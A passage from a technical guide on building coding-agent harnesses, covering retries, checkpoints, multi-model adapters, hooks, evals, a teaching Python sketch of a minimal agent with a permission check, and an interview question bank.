MAX_STEPS_PROMPT("CRITICAL - MAXIMUM STEPS REACHED … Tools are disabled"), so the model summarizes instead of stopping mid-action. mini-swe-agent has step, cost (default $3) and wall-time limits. - Doom loops. OpenCode asks the user after 3 identical consecutive tool calls (processor.ts). Gemini's loopDetectionService.ts catches tool-call cycles, repeated content and (after 30 turns) LLM-judged loops. It nudges once, then stops.
Retries with backoff
| Harness | Policy |
|---|---|
| Codex | 5 stream / 4 request retries (model-provider-info); 200 ms × 2ⁿ ±10% unless the server advises; context-overflow and usage-limit errors are terminal |
| OpenCode | 2 s × 2ⁿ ±25%, 30 s cap, 5 retries; honors retry-after (retry.ts) |
| Gemini CLI | 10 attempts, 5→30 s ±30%; persistent 429 can switch to a fallback model (retry.ts) |
Retry transport failures only (resets, 429, 5xx, stalled streams). A tool failure goes back to the model as an error result, because the model decides what to try next.
Interrupt and steer
Codex propagates a CancellationToken to in-flight tools and records an "interrupted turn" marker for the model (tasks/mod.rs). Pi separates queued input (agent.ts). steer() messages "enter after the current assistant turn". followUp() messages enter only when the agent would otherwise stop.
Checkpoints and rewind
- Shadow git repo. OpenCode runs
git --git-dir <shadow> --work-tree <repo>, snapshotting withwrite-treeeach step and restoring withread-tree+checkout-index(snapshot/index.ts). Gemini does the same when checkpointing is enabled (gitService.ts). This catches bash-made changes and leaves the user's history alone. - Per-edit snapshots: Claude Code's
/rewind"does not track files modified by Bash commands". Anthropic docs - Real commits: Aider's
/undoreverts only commits Aider made. - History only: Codex's
thread/revert"does not revert local file changes". Pi's/treebranches the conversation.
Session persistence, parallelism, streaming, cost
- Sessions: append-only logs, because they are crash-safe and replayable. Codex writes typed JSONL rollouts under
~/.codex/sessions/withcodex resume/fork. Pi's JSONL entries form a tree viaid/parentId(session-format.md). OpenCode uses SQLite. - Parallel tool calls: Codex puts calls behind an
RwLock. Parallel-safe tools share the read lock, the others take the write lock (tools/parallel.rs). Pi runs a batch sequentially if any tool in it asks for that. - Streaming: render tokens as they arrive, but execute only complete tool calls.
- Cost: pi-ai's
Usageseparates input, output, cache read/write and reasoning tokens, with acostbreakdown (ai/src/models.ts). Cache reads are most of a long session's tokens.
"User hits Esc mid-task: what happens?" Cancel the stream, kill child process groups (mini-swe-agent uses os.killpg), write synthetic results for unfinished tool calls (providers reject dangling calls), add an interrupt marker, persist the log, and queue the user's next input as steering.
- Pi how-pi-works.md: steering vs follow-up queues.
- OpenCode snapshot/index.ts: the shadow-git technique in about one file.
- Effective harnesses for long-running agents: initializer agent, progress files, feature lists.
9. Multi-model support
What actually differs between providers
| Dimension | Differences you must normalize | Real handling |
|---|---|---|
| Message shape | System as a parameter vs a message; content blocks vs strings; tool results as a user block (Anthropic) vs a tool role vs function_call_output items (Responses) | pi-ai has one internal Context, and each API module converts it (ai/src/api/) |
| Tool-call IDs | Format and length rules vary | OpenCode reduces Mistral tool-call IDs to 9 alphanumerics (transform.ts) |
| Empty or odd content | Anthropic rejects empty content; DeepSeek requires reasoning on assistant messages | OpenCode's normalizeMessages |
| Thinking / reasoning | Signed or encrypted reasoning is only valid for the same model | pi-ai keeps signed thinking for the same model, drops redacted thinking otherwise, and converts other thinking to plain text when you switch models mid-session (transform-messages.ts) |
| Caching | Explicit breakpoints (Anthropic cache_control, Bedrock cachePoint) vs automatic prefix caching (OpenAI) | OpenCode applyCaching; pi-ai PI_CACHE_RETENTION and a separate openai-prompt-cache.ts |
| Tool-calling quirks | Misspelled names, JSON-in-a-string args, grammar or freeform tools | OpenCode experimental_repairToolCall; Pi's lenient edit schema; Codex freeform Lark tools |
| Metadata | Context window, max output, pricing, capabilities | OpenCode fetches a catalog from models.opencode.ai (models.dev data). pi-ai generates its registry from models.dev + OpenRouter at build time (generate-models.ts) |
Per-model prompts and tools
Even model-agnostic harnesses tune per model:
- Prompts: OpenCode has one prompt file per model family (§2). Aider adds per-model prefixes and corrective prompts.
- Tools: OpenCode switches
apply_patch↔edit/write. Codex'sModelInfosets shell type, patch tool type, truncation and parallel-call support per model. - Roles: Aider's architect mode pairs a planning model with an "editor" model and format. A "weak model" writes commit messages and summaries. Gemini routes between Gemini variants (routing/strategies/).
Tuned for one model family
Codex is Responses-only. Gemini CLI authenticates only against Gemini endpoints. Upside: the model can be co-trained on the exact tools, and provider features (server-side compaction, hosted search) come for free. Downside: lock-in.
Model-agnostic
OpenCode, Pi and Aider (via LiteLLM). Upside: user choice, and the harness survives model churn. Downside: least-common-denominator features, a growing tuning matrix, and models that may do best in their vendor's harness (§1).
Key line for the multi-provider question: adapters per wire API, not per vendor, because most vendors are OpenAI-compatible. Then add that "supports tool calling" says nothing about how well, so run the eval suite per model.
- pi-ai README: cross-provider handoffs and context serialization.
- OpenCode provider/transform.ts: a catalog of real provider quirks.
- Codex prompting guide: why a vendor recommends its exact tool implementations.
10. Extensibility architecture
B7 covers configuration. This section covers implementation.
MCP client
The same pattern everywhere: spawn stdio servers or connect over streamable HTTP, list tools, namespace them (mcp__server__tool in Pi, mcp_server_tool in Gemini), and route calls through the same permission engine as built-in tools. Codex uses the Rust rmcp SDK (rmcp-client/). OpenCode and Gemini use @modelcontextprotocol/sdk. Pi wrote its own (packages/mcp). Two problems recur: tool-count bloat, solved by tool search, and OAuth for remote servers.
Hooks: the event model
| Harness | Events (abridged) | Blocking semantics |
|---|---|---|
| Claude Code | SessionStart, UserPromptSubmit, PreToolUse, PermissionRequest, PostToolUse, Stop, SubagentStop, PreCompact … (~30) | Exit code 2 blocks, and a JSON permissionDecision: "allow" can't override it. JSON decision: "block" also works. docs |
| Codex | PreToolUse, PostToolUse, PermissionRequest, PreCompact, PostCompact, SessionStart, SessionEnd, Stop, SubagentStart/Stop, UserPromptSubmit, Interrupt | hooks/ crate (plus the legacy notify) |
| Gemini CLI | BeforeTool, AfterTool, BeforeAgent, AfterAgent, BeforeModel, AfterModel, BeforeToolSelection, PreCompress, SessionStart/End, Notification | 0 allow, 1 warn, other codes (including 2) block (core/src/hooks/) |
| OpenCode | tool.execute.before/after, permission.ask, chat.params, shell.env, experimental.session.compacting, tool.definition … | In-process TypeScript plugin functions (plugin/src/index.ts) |
| Pi | tool_call (can mutate or block), tool_result, context, before_agent_start, session_before_compact … | In-process TS extensions loaded with jiti; can also register tools, commands and providers (extensions.md) |
There are two styles. Command hooks (Claude Code, Codex, Gemini) work in any language and can be centrally managed, but cost a process spawn per call. In-process plugins (OpenCode, Pi) are fast and can change anything, and they run with the harness's own privileges.
Skills and progressive disclosure
Every harness here except Aider supports skills, and the pattern is the same wherever it is documented. At startup they scan SKILL.md files and put only the frontmatter name and description (plus path) into the prompt. The body loads only when the task needs it. Claude Code has a Skill tool, OpenCode a skill tool, and Gemini an activate_skill tool. Pi "advertises each available skill by name and description, then loads its full instructions only when the task calls for them" (skills.md). Codex embeds system skills in its skills crate. OpenCode also scans .claude/skills and .agents/skills (skill/index.ts).
Subagents
A subagent is a tool that runs another loop with its own context, tools and permissions, and returns a summary. Codex exposes lifecycle tools (spawn_agent, wait_agent …). OpenCode's task creates a child session (task.ts). Gemini's invoke_agent reaches built-ins like codebase_investigator, markdown-defined agents, or remote A2A agents. Its local agents must call complete_task within 30 turns or 10 minutes by default (agents/types.ts).
Headless modes, SDKs, client/server
| Harness | Headless | SDK / server |
|---|---|---|
| Claude Code | claude -p --output-format stream-json | Claude Agent SDK (@anthropic-ai/claude-agent-sdk, claude-agent-sdk for Python), "a library that runs the Claude Code binary". It no longer uses Claude Code's system prompt unless you pass the claude_code preset. docs |
| Codex | codex exec --json (JSONL), --output-schema | @openai/codex-sdk spawns codex exec --experimental-json (sdk/typescript/src/exec.ts). The Python openai-codex SDK talks to app-server over stdio. |
| OpenCode | opencode run --format json | opencode serve HTTP server; @opencode-ai/sdk generated from OpenAPI |
| Gemini CLI | -p --output-format json|stream-json | @google/gemini-cli-sdk; a2a-server; --acp |
| Pi | -p, --mode json | --mode rpc (JSONL commands on stdin), createAgentSession() SDK |
The trend is core as server, UIs as clients (Codex app-server, OpenCode server). For editors, Zed's Agent Client Protocol (JSON-RPC over stdio) standardizes the editor-to-agent link. Its site lists Gemini CLI, OpenCode, Goose and Cline as agents, with Claude Code and Codex via adapters. ACP site
Building the TUI first and bolting on headless mode later, which tangles events with rendering. Design the core as an event stream (turn_start, message_delta, tool_call, tool_result, approval_request, turn_end, usage) from day one, so the UIs, SDKs and evals all consume the same stream.
- Claude Code hooks reference: the most complete documented hook contract.
- Pi extensions.md: what a fully in-process extension API looks like.
- Agent Client Protocol: editor↔agent standard.
11. Evaluating a harness
Methodology is in B5. The key rule: change one variable and hold the model fixed.
External benchmarks
| Benchmark | What it measures | Status notes |
|---|---|---|
| SWE-bench Verified | Resolving real GitHub issues in Python repos, graded by hidden tests | Its "Bash Only" view fixes the harness (mini-SWE-agent) to compare models. The other views compare model+harness systems. swebench.com |
| SWE-Bench Pro (Scale) | 1,865 tasks across 41 repos, including held-out and commercial code, to resist contamination | Scale's own runs use the SWE-Agent scaffold. Scale 2025 |
| Terminal-Bench | Hard terminal tasks in containers. The leaderboard pairs an agent with a model. | Versions up to 4.0 as of Aug 2026; Terminus is the neutral reference harness. tbench.ai |
| Aider polyglot | 225 hard Exercism exercises in 6 languages: can the model edit code and produce a well-formed edit | Reports pass rate and percent_cases_well_formed (benchmark/) |
Benchmark versions and leaderboards change monthly, and public benchmarks saturate and leak into training data. Treat public scores as a sanity check. Your internal suite is what decides harness changes.
Internal evals: what the harness teams ship
- Behavioral evals: Gemini CLI's evals/ "verify that the model chooses to take the correct action". There are about 40 cases (
frugalReads,shell_command_safety,prompt_injection_mcp…), each taggedALWAYS_PASSES,USUALLY_PASSESorUSUALLY_FAILSto cope with nondeterminism. Pi has packages/evals. - Regression suites: real tasks from your repos with automated checks, run on every prompt or tool change.
- A/B tests: k runs per arm, with confidence intervals. Anthropic recommends "pass@k for tools where one success matters, pass^k for agents where consistency is essential" and to "grade what the agent produced, not the path it took". Anthropic 2026
- Trajectory analysis: bucket the failures (wrong file, edit failed, ignored tests, looped, overflowed) and fix the top bucket. Aider's "spurious leading blank line" fallback exists because GPT did that.
- Efficiency: cost per solved task, turns, wall time, edit-failure rate, prompts per task.
A strong extra point: a change that adds 1 point of pass rate but doubles cost is usually a regression. Report both.
- Demystifying evals for AI agents: pass@k vs pass^k, graders, harness as part of the unit.
- Gemini CLI evals README: a production harness's behavioral eval setup.
- B5: eval statistics and trace-based debugging.
12. Build your own minimal harness
A compact Python coding agent: the loop, four tools, a permission check, truncation and a compaction stub, written against the Anthropic Messages API shape. It is a teaching sketch. Check the SDK calls against current docs before running it.
# mini_harness.py: teaching sketch, not production code.
import json, os, re, subprocess, pathlib
import anthropic
client = anthropic.Anthropic() # reads ANTHROPIC_API_KEY
MODEL = os.environ["AGENT_MODEL"] # set to a current model ID
ROOT = pathlib.Path.cwd().resolve()
MAX_STEPS, MAX_OUT, COMPACT_AT = 60, 20_000, 150_000 # chars / tokens (rough)
read_files: set[str] = set() # file-state tracking for the edit guard
def clip(s: str, limit: int = MAX_OUT) -> str:
"""Head+tail truncation: keep the start and (more importantly) the end."""
if len(s) <= limit: return s
h = limit // 2
return s[:h] + f"\n…[{len(s)-limit} chars truncated]…\n" + s[-h:]
def safe_path(p: str) -> pathlib.Path:
q = (ROOT / p).resolve()
if not q.is_relative_to(ROOT): raise ValueError(f"{p} is outside the workspace")
return q
# ---- tools -----------------------------------------------------------
def t_read(path, offset=0, limit=2000):
lines = safe_path(path).read_text().splitlines()
read_files.add(str(safe_path(path)))
body = "\n".join(f"{i+1:6}\t{l}" for i, l in enumerate(lines[offset:offset+limit], offset))
more = f"\n[{len(lines)-offset-limit} more lines; use offset]" if len(lines) > offset+limit else ""
return clip(body) + more
def t_edit(path, old, new):
f = safe_path(path)
if str(f) not in read_files: return "Error: read the file before editing it."
text = f.read_text(); n = text.count(old)
if n == 0: return "Error: old text not found. It must match exactly, including whitespace. Re-read the file."
if n > 1: return f"Error: old text appears {n} times. Add surrounding lines to make it unique."
f.write_text(text.replace(old, new, 1)); return f"Edited {path}."
def t_write(path, content):
f = safe_path(path); f.parent.mkdir(parents=True, exist_ok=True)
f.write_text(content); read_files.add(str(f)); return f"Wrote {len(content)} chars to {path}."
def t_bash(command, timeout=120):
try:
r = subprocess.run(command, shell=True, cwd=ROOT, capture_output=True, text=True, timeout=timeout)
return clip(f"exit={r.returncode}\n{r.stdout}{r.stderr}")
except subprocess.TimeoutExpired:
return f"Error: timed out after {timeout}s. Use a narrower command or a longer timeout."
TOOLS = {"read": t_read, "edit": t_edit, "write": t_write, "bash": t_bash}
SCHEMAS = [
{"name": "read", "description": "Read a text file with line numbers. Use offset/limit for large files.",
"input_schema": {"type": "object", "properties": {"path": {"type": "string"},
"offset": {"type": "integer"}, "limit": {"type": "integer"}}, "required": ["path"]}},
{"name": "edit", "description": "Replace one exact, unique occurrence of `old` with `new`. Read the file first.",
"input_schema": {"type": "object", "properties": {"path": {"type": "string"},
"old": {"type": "string"}, "new": {"type": "string"}}, "required": ["path", "old", "new"]}},
{"name": "write", "description": "Create or overwrite a file with full content.",
"input_schema": {"type": "object", "properties": {"path": {"type": "string"},
"content": {"type": "string"}}, "required": ["path", "content"]}},
{"name": "bash", "description": "Run a shell command in the repo root. Output is truncated; filter it (e.g. | tail -50).",
"input_schema": {"type": "object", "properties": {"command": {"type": "string"},
"timeout": {"type": "integer"}}, "required": ["command"]}},
]
# ---- permissions (deliberately simple; see section 7 for the real thing) ----
SAFE = re.compile(r"^(ls|cat|grep|rg|find|git (status|diff|log)|pytest|python -m pytest)\b")
SEPARATORS = re.compile(r"(&&|\|\||;|\||`|\$\(|>|\n)")
def allowed(name, args) -> bool:
if name in ("read",): return True
if name == "bash":
cmd = args["command"].strip()
if not SEPARATORS.search(cmd) and SAFE.match(cmd): return True # no chaining tricks
ans = input(f"\nAllow {name} {json.dumps(args)[:200]}? [y/N] ")
return ans.strip().lower() == "y"
# ---- context management stub ----
def maybe_compact(messages, usage_in):
if usage_in < COMPACT_AT: return messages
summary = client.messages.create(model=MODEL, max_tokens=2000,
system="Summarize this coding session for another engineer: goal, constraints the user stated, "
"decisions, files changed, current state, next step. Be specific.",
messages=messages + [{"role": "assistant", "content": "(pausing to summarize)"},
{"role": "user", "content": "Write the summary now."}]).content[0].text
return [{"role": "user", "content": f"[Summary of earlier work]\n{summary}\n\nContinue the task."}]
# NB: a real version cuts at a turn boundary and keeps recent turns verbatim.
SYSTEM = (f"You are a coding agent working in {ROOT}. Use tools to inspect, edit and test. "
"Verify with tests before saying you are done. Be concise.")
if (ROOT / "AGENTS.md").exists(): SYSTEM += "\n\n# Project instructions\n" + (ROOT / "AGENTS.md").read_text()[:32_000]
def run(task: str):
messages = [{"role": "user", "content": task}]
for step in range(MAX_STEPS):
resp = client.messages.create(model=MODEL, max_tokens=8000, system=SYSTEM,
tools=SCHEMAS, messages=messages)
messages.append({"role": "assistant", "content": resp.content})
for b in resp.content:
if b.type == "text": print(b.text)
if resp.stop_reason != "tool_use": return # turn complete
results = []
for b in resp.content:
if b.type != "tool_use": continue
if not allowed(b.name, b.input):
out, err = "Denied by user. Try a different approach or ask.", True
else:
try: out, err = TOOLS[b.name](**b.input), False
except Exception as e: out, err = f"Error: {e}", True # errors go back to the model
results.append({"type": "tool_result", "tool_use_id": b.id, "content": out, "is_error": err})
messages.append({"role": "user", "content": results})
messages = maybe_compact(messages, resp.usage.input_tokens)
print("Stopped: step limit reached.")
if __name__ == "__main__":
run(input("Task: "))
The stub replaces all history. Production versions (Pi, Codex) keep recent turns verbatim and cut only at safe points.
What to add next: the ladder
- Prompt caching breakpoints (B1).
- Streaming, interrupts, process-group kill, synthetic results for unfinished calls.
- Jittered retries that honor
retry-after. - tree-sitter shell parsing, deny-wins rules, narrowed approvals.
- OS sandbox with default-deny network, or a container.
- JSONL session log with resume, then shadow-git snapshots.
- Better edits: normalized fallback, multi-edit, lint/LSP diagnostics.
- Grep/glob, todo and subagent tools.
- Real compaction: clear tool output first, safe cut, structured summary.
- Provider abstraction and per-model tools and prompts.
- MCP, hooks, skills, headless JSONL mode.
- An eval harness: fixed tasks, k runs, cost tracking, trajectory viewer.
In a live exercise, write the loop plus bash and a uniqueness-checked edit, then talk through the ladder in order. Interviewers want to see prioritization: safety and context before features, evals before tuning.
- mini-swe-agent default.py: compare your sketch with a benchmarked minimal agent.
- Pi agent-loop.ts: the next rung, with events, parallel tools and steering.
- Anthropic text editor tool docs: API contract for str_replace-style editing.
Interview question bank
Design a coding-agent harness from scratch.
Clarify the scope (local or cloud, one model or many), then build an event-streaming core (turn loop, retries, interrupts, step and cost limits) behind a protocol, so TUI, IDE, headless and SDK are all clients, as in Codex's app-server and OpenCode's server. Add a provider layer with one internal message model, and a prompt assembler ordered for caching. Keep the tool set small: read, exact-unique edit, write, bash, search, todo, subagent, all with capped output. Then a context manager (prune tool output, then structured compaction), a policy engine plus an OS sandbox with default-deny network, a session log with resume and shadow-git snapshots, and MCP, hooks and skills. Build the eval suite before tuning.
How would you implement context compaction?
Trigger on provider-reported input tokens, leaving headroom for the summary call and the next response (Pi: window − 16,384; Codex: 90%). First clear old tool outputs, which is cheap. Then cut at a turn boundary, never between a tool call and its result. Keep recent turns verbatim and summarize the rest with a template: goal, user constraints, decisions, files touched, progress, next step. Re-inject AGENTS.md. Keep the raw log, cap attempts to avoid thrashing, and eval on long tasks that depend on an early constraint.
Search/replace vs unified diff vs whole-file edits: trade-offs?
Whole file is reliable for small files, but expensive, and it invites "rest unchanged" elisions. Search/replace (or a string-replace tool) is cheap and reviewable. It fails loudly on a mismatch, so pair it with a uniqueness check and an actionable error. Unified diff is familiar from pre-training, but models get line numbers wrong, so practical variants (Aider udiff, Codex apply_patch) locate hunks by context instead. Aider measured GPT-4 Turbo going from 20% to 61% on its laziness benchmark by switching to udiff. The best format depends on the model and what it was trained on, so A/B the formats per model.
How do you make a harness work across multiple model providers?
One internal representation for messages, tool calls, thinking and usage. One adapter per wire API (Anthropic Messages, OpenAI Responses, OpenAI-compatible, Gemini), not per vendor. A transform pass for provider quirks (empty content, tool-ID formats, required reasoning fields). Drop or convert thinking blocks when the model changes. Cache breakpoints live in the adapter. A model registry holds windows, prices and capabilities. Prompts and tools are selectable per model. Run evals per model, and gate provider-only features behind capability flags.
How do you evaluate a harness change?
Hold the model, sampling settings and tasks fixed, and change one harness variable. Use real-repo tasks with automated checks, plus targeted behavioral cases. Run several trials per arm and report confidence intervals, plus pass^k for consistency. Track cost per solved task, turns, latency, edit-failure rate and prompts per task. Read the failing trajectories and bucket the causes. Ship behind a flag and watch interrupts and rewinds.
How do you implement a permission system for shell commands?
Parse with tree-sitter-bash into sub-commands, splitting across &&, ||, ;, pipes, subshells and substitutions, and unwrap bash -c and env. Deny if any sub-command matches a deny rule. Allow only if all match allow rules. Otherwise use the mode default and danger heuristics, and ask, or deny when headless. Store "always allow" as an arity-narrowed prefix (git push *, not git *). Then say it's advisory. The real boundary is an OS sandbox with filesystem and network limits.
Why might a minimal harness beat a feature-rich one?
Every tool schema and prompt paragraph costs context on every call, and every extra tool is another wrong choice the model can make. Strong models already know bash. mini-swe-agent, with one bash tool and a linear history, was reported at 65% on SWE-bench Verified. You lose structured diffs, per-tool permissions and undo. Pi's answer is a minimal core with extensible edges.
How should tool output be truncated?
Always cap it. For command output keep the tail, where errors and summaries are, or head plus tail with a marker (Codex: 10k tokens). For file reads keep the head and offer offset/limit. The best pattern is spill-to-file: save the full output and return the path so the model can grep it (OpenCode, Pi, Gemini). Always tell the model that output was cut and how to get the rest.
Policy layer vs sandbox: why both?
The policy decides whether an action runs. The sandbox limits what it can do once it runs. Policies can be bypassed by indirection, and a sandbox without policy either over-restricts or needs constant escalation. Codex combines them: with sandbox mode workspace-write and approval policy on-request, routine commands run unprompted inside the sandbox, and the model asks only to escalate. That cuts prompt fatigue without giving up safety.
How do you implement undo/checkpoints?
Per-edit file snapshots (Claude Code) miss bash-made changes. Real commits (Aider) are honest but clutter history. A shadow git repo (OpenCode, Gemini) captures every change without touching the user's repo: git --git-dir=<private> --work-tree=<repo> plus write-tree per step. Offer file restore and conversation restore as separate operations. Codex's thread/revert only rewinds history, which is itself a product choice.
How do you handle parallel tool calls safely?
Classify tools as parallel-safe (reads, search) or exclusive (writes, side-effecting shell). Codex uses an RwLock: read guard for safe tools, write guard for the rest. Serialize writes per file. Show permission prompts one at a time. Return results in call order with matching IDs, and on abort give every call a result.
Your agent keeps repeating the same failing command. What do you build?
Loop detection: exact repeats (OpenCode asks after 3), cycle and content-repeat detection, and optionally an LLM judge (Gemini). On the first detection, inject "step back" feedback. On the second, stop and hand control to the user. Then fix the cause, which is usually an unhelpful error or truncation that hid the real error, and add the case to the regression suite.
Why use freeform/grammar tools instead of JSON tool calls?
Code inside JSON needs escaping, costs tokens, and looks unlike pre-training data. Codex's apply_patch is a freeform tool constrained by a Lark grammar, so the model writes a raw patch that is guaranteed to parse. Aider skipped tool calling entirely for edits. The cost: grammar tools are provider-specific, and text formats need your own robust parser.
How should subagents be designed, and when are they worth it?
A subagent runs a separate loop with fresh context and restricted tools, and returns only a summary. That suits search-heavy exploration and parallel investigation. Give it explicit termination and budgets (Gemini: complete_task, 30 turns, 10 minutes) and its own permission set (OpenCode's explore). Avoid subagents for tightly coupled edits, where the parent loses detail it needs. See B4.
What can the harness do about prompt injection through repo content?
AGENTS.md, READMEs, issues, web pages and MCP results all reach the context. Mitigations: trust gates before loading project config or hooks; default-deny network; secrets outside readable paths; approval for out-of-workspace writes and network; untrusted labels on fetched content; compaction prompts that refuse injected instructions (Gemini); and injection cases in the evals. None is enough alone. See B5.